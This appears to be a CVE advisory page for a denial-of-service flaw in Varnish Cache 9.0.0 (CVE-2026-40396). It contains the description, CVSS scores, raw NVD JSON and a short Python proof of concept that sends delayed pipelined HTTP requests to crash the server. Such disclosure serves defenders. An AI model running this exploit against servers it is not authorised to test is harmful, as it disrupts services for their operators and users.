Security Vulnerability Report
CVE-2026-40396 CVSS 4.0 MEDIUM

Published: 2026-04-12 20:16:19
Last Modified: 2026-04-17 14:38:10

Description

Varnish Cache 9 before 9.0.1 allows a "workspace overflow" denial of service (daemon panic) after timeout_linger. A malicious client could send an HTTP/1 request, wait until the session releases its worker thread (timeout_linger), and resume traffic before the session is closed (timeout_idle), sending more than one request at once to trigger a pipelining operation between requests. This vulnerability, affecting Varnish Cache 9.0.0, emerged from a port of the Varnish Enterprise non-blocking architecture for HTTP/2. New code was needed to adapt to a more recent workspace API that formalizes the pipelining operation. In addition to the workspace change on the Varnish Cache side, other differences created merge conflicts, such as partial support for trailers in Varnish Enterprise. The conflict resolution missed one code path that configures pipelining to perform a complete workspace rollback, losing the guarantee that prefetched data would fit inside workspace_client during the transition from one request to the next. This can result in a workspace overflow, triggering a panic and crashing the Varnish server.

CVSS Details

CVSS Score
4.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:vinyl-cache:vinyl_cache:9.0.0:*:*:*:*:*:*:* - VULNERABLE
Varnish Cache 9.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket
import time

# Target configuration
TARGET_HOST = "127.0.0.1"
TARGET_PORT = 80


def exploit_cve_2026_40396():
    """
    PoC for CVE-2026-40396: Varnish Cache workspace overflow DoS.
    This script sends an HTTP/1 request, waits for timeout_linger,
    and then sends pipelined requests to trigger the overflow.
    """
    try:
        # Establish connection
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_HOST, TARGET_PORT))

        # Send initial HTTP/1 request
        payload1 = "GET / HTTP/1.1\r\nHost: " + TARGET_HOST + "\r\n\r\n"
        s.send(payload1.encode())

        # Wait for timeout_linger (ensuring worker thread is released but session remains)
        # Adjust sleep time based on server configuration
        print("[*] Waiting for timeout_linger...")
        time.sleep(10)

        # Send pipelined requests to trigger workspace overflow
        # Sending multiple requests at once to force pipelining operation
        payload2 = (
            "GET / HTTP/1.1\r\nHost: " + TARGET_HOST + "\r\n\r\n"
            + "GET / HTTP/1.1\r\nHost: " + TARGET_HOST + "\r\n\r\n"
            + "GET / HTTP/1.1\r\nHost: " + TARGET_HOST + "\r\n\r\n"
        )
        print("[*] Sending pipelined requests...")
        s.send(payload2.encode())

        # Keep connection open briefly to ensure processing
        time.sleep(2)
        s.close()
        print("[+] Exploit payload sent.")
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    exploit_cve_2026_40396()

References

https://github.com/varnish/varnish/issues/15 (Issue Tracking)
https://github.com/varnish/varnish/releases/tag/varnish-9.0.1 (Product)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-40396",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-12T20:16:19.057",
    "lastModified": "2026-04-17T14:38:09.830",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Varnish Cache 9 before 9.0.1 allows a \"workspace overflow\" denial of service (daemon panic) after timeout_linger. A malicious client could send an HTTP/1 request, wait long enough until the session releases its worker thread (timeout_linger) and resume traffic before the session is closed (timeout_idle) sending more than one request at once to trigger a pipelining operation between requests. This vulnerability affecting Varnish Cache 9.0.0 emerged from a port of the Varnish Enterprise non-blocking architecture for HTTP/2. New code was needed to adapt to a more recent workspace API that formalizes the pipelining operation. In addition to the workspace change on the Varnish Cache side, other differences created merge conflicts, like partial support for trailers in Varnish Enterprise. The conflict resolution missed one code path configuring pipelining to perform a complete workspace rollback, losing the guarantee that prefetched data would fit inside workspace_client during the transition from one request to the next. This can result in a workspace overflow, triggering a panic and crashing the Varnish server."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:N/A:L",
            "baseScore": 4.0,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 1.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-670"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:vinyl-cache:vinyl_cache:9.0.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "9868204A-88AD-46D2-BE0B-92FF686B7DE4"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/varnish/varnish/issues/15",
        "source": "[email protected]",
        "tags": ["Issue Tracking"]
      },
      {
        "url": "https://github.com/varnish/varnish/releases/tag/varnish-9.0.1",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}